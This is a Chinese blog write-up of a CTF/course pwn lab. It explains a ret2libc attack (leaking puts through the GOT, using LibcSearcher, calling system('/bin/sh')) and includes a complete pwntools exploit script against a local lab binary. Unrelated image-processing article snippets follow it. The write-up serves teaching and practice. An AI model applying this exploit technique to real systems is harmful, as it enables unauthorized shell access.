Tamevic’s Ctf-Pwn writeup@软件安全‘实验3pwn’

最新推荐文章于 2022-10-03 10:49:34 发布
最新推荐文章于 2022-10-03 10:49:34 发布
阅读量395 收藏
点赞数
分类专栏: pwn 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43264421/article/details/88665008
版权

Tamevic’s Ctf-Pwn writeup@软件安全‘实验3pwn’

实验难度升级==有点晕了

文件
其实和实验2是同一个文件,然后我还没传网盘…然后…好吧我承认我有拖延症…
3.24更新:我来发文件了…链接:https://pan.baidu.com/s/19gIMQhEQSaB3LJWb1rFFYQ 密码:6xlt

分析

这次实验的要求是不允许直接使用System函数,也不允许使用文件自带的getflag()函数,需要使用一些其他的技巧来获得System函数的地址。

划重点:
参考CTF-WIKI:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3
System函数是libc.so函数库中的一个函数,而且函数和函数在其中的相对位置(或者说相对偏移)不会发生变化,所以我们可以先使用一个其他的函数,得到它的地址,确定这个函数使用的libc版本(libc在github上有人收集),然后再获得System函数的地址。
那如何获得某个函数的地址?具体操作是使用got表泄露,即将这个函数got表中的内容输出出来即可。

关于got表和plt表,可以看看这篇博客:https://blog.youkuaiyun.com/qq_18661257/article/details/54694748

所以基本操作就是先获得libc,然后在库中查询System函数(其实’/bin/sh‘字符串在libc中也有,也可以同样查询出来),这里用到一个工具LibcSearcher(https://github.com/lieanu/LibcSearcher )

具体exp思路:

  • 利用一次主函数的溢出,将ret设置为想要溢出的函数的plt表地址(我们这里用的是’puts‘函数), 将got表中的数据输出出来,并再次进入主函数
  • 获得libc版本,计算System函数地址,计算’/bin/sh‘字符串地址
  • 再次利用main()函数的溢出,使程序跳转到system(’/bin/sh’),随后getshell

-看看主函数在这里插入图片描述记下主函数地址0x080484FD

-写脚本
之前对pwn理解不够深入,一直使用的是静态分析,但简单的东西还能这样做,稍微复杂一些的程序执行起来的样子只有动态调试才能知道。
这里就有一些写脚本的技巧:

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']

第一句的目的是将python和程序之间进行的交互内容公开出来(也可以理解为调试),对其中每一步的变化都可见;
第二句的目的是新建一个terminal,便于进行gdb调试

pwnlib.gdb.attach(sh)

这里就是pwntools自带的工具,大概功能就是在程序的相应位置下断点,然后利用新建的terminal窗口进行调试。但是这里其实是有些缺陷,断点的位置通常会滞后。

已经使用的函数的plt表地址和got表地址怎么获取?这里也是pwntools的一个附件可以实现
在这里插入图片描述LibcSearcher怎么使用?

libc = LibcSearcher('函数名',已经泄露的地址)
libcbase = 已经泄露的地址 - libc.dump('函数名')
想要泄露的函数地址 = libcbase + libc.dump('想要泄露的函数地址')

写好exp开始运行,得到结果

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']

sh=process('./pwn')
elf=ELF('./pwn')

main_addr=0x080484FD

puts_plt=elf.plt['puts']
print('puts_plt',hex(puts_plt))
puts_got=elf.got['puts']
print('puts_got',hex(puts_got))

#pwnlib.gdb.attach(sh)

payload='a'*112+p32(puts_plt)+p32(main_addr)+p32(puts_got)

sh.recvuntil('try\n')
sh.sendline(payload)

#print ('got libc_st_main')

puts_addr = u32(sh.recv(4))
#print ('puts_addr',hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
#print libc
libcbase = puts_addr - libc.dump('puts')
#print '!'
system_addr = libcbase + libc.dump('system')
#print"!"
binsh_addr = libcbase + libc.dump('str_bin_sh')
#print'!'

payload = 'A'*104+ p32(system_addr) + 'b'*4 + p32(binsh_addr)
sh.sendline(payload)

sh.interactive()

结果

运行脚本,getshell
在这里插入图片描述

这里其实还有很多问题:
可能有些人能看到,我两次main()函数中溢出的位置不一样,一次是0x6c+4 ,一次是0x64+4 ,这就需要动态调试去发现了。由于s=esp+0x1c,用ebp-esp-0x1c 就可以知道溢出位置。

End

其实本可以很早就能做出来的…最致命操作是我写错了 ’system’ …还有‘str_bin_sh’…然后就造成下面这种情况在这里插入图片描述明明匹配到了libc库却找不到函数…
枯了。

使用PIL\matplotlib\numpy读取和展示图像文件
weixin_44620028的博客
11-02 1332
使用PIL\matplotlib\numpy读取和展示图像文件 1.安装PIL,matplotlib,numpy install mudule - numpy matplotlib numpy python -m pip install --upgrade pip #更新pip安装工具 #安装numpy,matplotlib,PIL pip install numpy pip in...
通过Python PIL.Image加载图片,使用numpy进行图像简单处理
weixin_43798683的博客
11-20 3779
Python PIL.Image加载图片,使用numpy进行图像简单处理 读入图片转换为ndarray: import numpy as np from PIL import Image a_num = np.array(Image.open('1.png')) a_num 转化的数组: array([[[181, 179, 193], [180, 177, 194], ...
python骚操作——图片灰度处理
sixkery的博客
09-08 4778
先来张图片感受下: 处理过的图片 代码奉上: from PIL import Image import numpy as np a = np.asarray(Image.open('1.jpg').convert('L')).astype('float') depath = 10 # (0-100) grad = np.gradient(a)# 取图像灰度的梯度值 grad_x,g...
numpy生成随机矩阵
syh的技术记录
11-21 4121
转载
PIL读取图片numpy格式并用matplolib显示
weixin_40756000的博客
05-17 1142
导入库 import os import nunpy as np from PIL import Image from matplotlib import pyplot as plt os.listdir() ----------------------------OUT--------------------------- ['1.png'] 用PIL读取图片 im = Image.open('1.png') ----------------------------OUT---------------
imshow显示矩阵保存的多张图片_imshow显示矩阵保存的多张图片_纯python抠图,用opencv+PIL来实现,简单有效...
weixin_36138385的博客
03-04 344
1 说明:=====1.1 抠图,我已经介绍过Remove.bg,依赖网络,需要API-key,一个账号只能50次使用,有限制。《Remove.bg:一款抠图神器介绍和python实现方法》。1.2 强大的万能的python行不行?当然,行!1.3 今天就用python+opencv+PIL来实现。以这张图来实现,图片来源今日头条免费正版图库2 准备:=====2.1 提前安装:python,op...
【图像处理】PILOpenCV的读取、显示、保存图片/ numpy与Image的转换
qq_45670134的博客
10-03 1639
【图像处理】PILOpenCV的读取、显示、保存图片/ numpy与Image的转换
OpenCV学习笔记(一):生成随机矩阵
本博客纯属个人学习记载,不对外负责,若有错误,请批评指正
11-10 3342
引言: 众所周知,OpenCV对图像对
一文掌握图像对应的cv2,PIL以及numpy矩阵大小之间的关系
LJC的博客
08-02 642
现在以图像train_aachen_000000_000019_leftImg8bit.jpg为例。属性详细信息(w * h)如下: 图像的示意图: 一、cv2读取图像 cv2读取的图像就是numpy的格式了。 import cv2 img = cv2.imread('./train_aachen_000000_000019_leftImg8bit.jpg') print(img.shape) # (1024, 2048, 3) (h, w, c) print(type(img)) # <
matplotlib无法正确显示numpy生成的数据
122&&113的博客
07-31 413
原始代码: from sklearn.datasets import make_regression import pandas as pd import matplotlib.pyplot as plt import numpy as np X = np.linspace(5350, 5400, 10).reshape(1, 10) + np.random.randn(1, 10) #① y = np.linspace(38.5, 41.8, 10).reshape(1, 10) + np.random
Python数据分析基础,随机数组、矩阵生成numpy的简单操作
qq_51023388的博客
07-05 4168
numpy的简单操作,实现随机数组、矩阵生成
python 学习系列(3) 读取并显示图片的两种方法
hjxu2016的博客
03-20 8686
python 读取并显示图片的两种方法 在 python 中除了用 opencv,也可以用 matplotlib 和 PIL 这两个库操作图片。本人偏爱 matpoltlib,因为它的语法更像 matlab。 一、matplotlib 1. 显示图片 import matplotlib.pyplot as plt # plt 用于显示图片 import matplotlib.ima
Tensor、NumpyPIL格式转换以及图像显示
欢迎关注,共同进步!
07-20 2206
Tensor、NumpyPIL格式转换以及图像显示方法
python实现读取并显示图片的方法(PIL
Drug discovery
06-15 2万+
PIL 1. 显示图片 1 2 3 fromPIL importImage im =Image.open('lena.png') im.show() 2. 将 PIL Image 图片转换为 numpy 数组 1 2 im_array =np.array(im) # 也可以用 np.asarray(im) 区别是 np.array() 是深拷贝,np.asarray() 是浅...
python进行基本的图像处理
xiao_lxl的专栏
02-10 2万+
转自 http://www.ituring.com.cn/tupubarticle/2024 第 1 章 基本的图像操作和处理 本章讲解操作和处理图像的基础知识,将通过大量示例介绍处理图像所需的 Python 工具包,并介绍用于读取图像、图像转换和缩放、计算导数、画图和保存结果等的基本工具。这些工具的使用将贯穿本书的剩余章节。 1.1 PIL:Python图像处理
[python][PIL]pil图像显示
martinkeith的博客
12-22 1万+
使用python进行数字图片处理,还得安装Pillow包。虽然python里面自带一个PIL(python images library), 但这个库现在已经停止更新了,所以使用Pillow, 它是由PIL发展而来的。 pip install Pillow 一、图片的打开与显示 from PIL import Image img=Image.open('d:/dog.png') img.show() 虽然使用的是Pillow,但它是由PIL fork而来,因此还是要从PIL中进行import.
使用PIL保存numpy格式的图片
qq_42584399的博客
06-20 4239
from PIL import Image Image.fromarray(np.uint8(image*255)).convert('RGB').save('filename',"png") 该代码是保存3通道RGB格式的图片所以要写convert(‘RGB’) 注意!!!这里还要对文件以255,即“image*255”,否则保存的图片是黑色的!!!原因是:图像imgae从0变为1,PIL需要一个值介于0和255之间的图像。在截断期间,您的图像将被截断值0或1,结果是黑色。 如果不使
Python图片转换成矩阵矩阵数据转换成图片
aibotlab的博客
09-02 8万+
# coding=gbk from PIL import Image import numpy as np # import scipy import matplotlib.pyplot as pltdef ImageToMatrix(filename): # 读取图片 im = Image.open(filename) # 显示图片 # im.show()
【从矩阵到图像的类型转换4】:PIL库Image类型与Numpy类型转换
呆呆象呆呆的博客
04-24 6699
一、PIL库读取图片后类型示例 from PIL import Image img=Image.open("./1.png") print("类型:",type(img)) print("类型名称:",img.__class__.__name__) # 显示和用户交互 import matplotlib.pyplot as plt plt.imshow(img) plt.show() 二、PIL库读取图片后Image类型转换成numpy 为了方便显示长宽我们换一张长宽不相等的图 from PIL im
python基础语法(二)——— plt的一些函数使用
热门推荐
qiurisiyu的博客
05-04 26万+
matplotlib1、plt.plot(x,y)plt.plot(x,y,format_string,**kwargs) x轴数据,y轴数据,format_string控制曲线的格式字串 format_string 由颜色字符,风格字符,和标记字符import matplotlib.pyplot as pltplt.plot([1,2,3,6],[4,5,8,1],’g-s’) plt.show...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值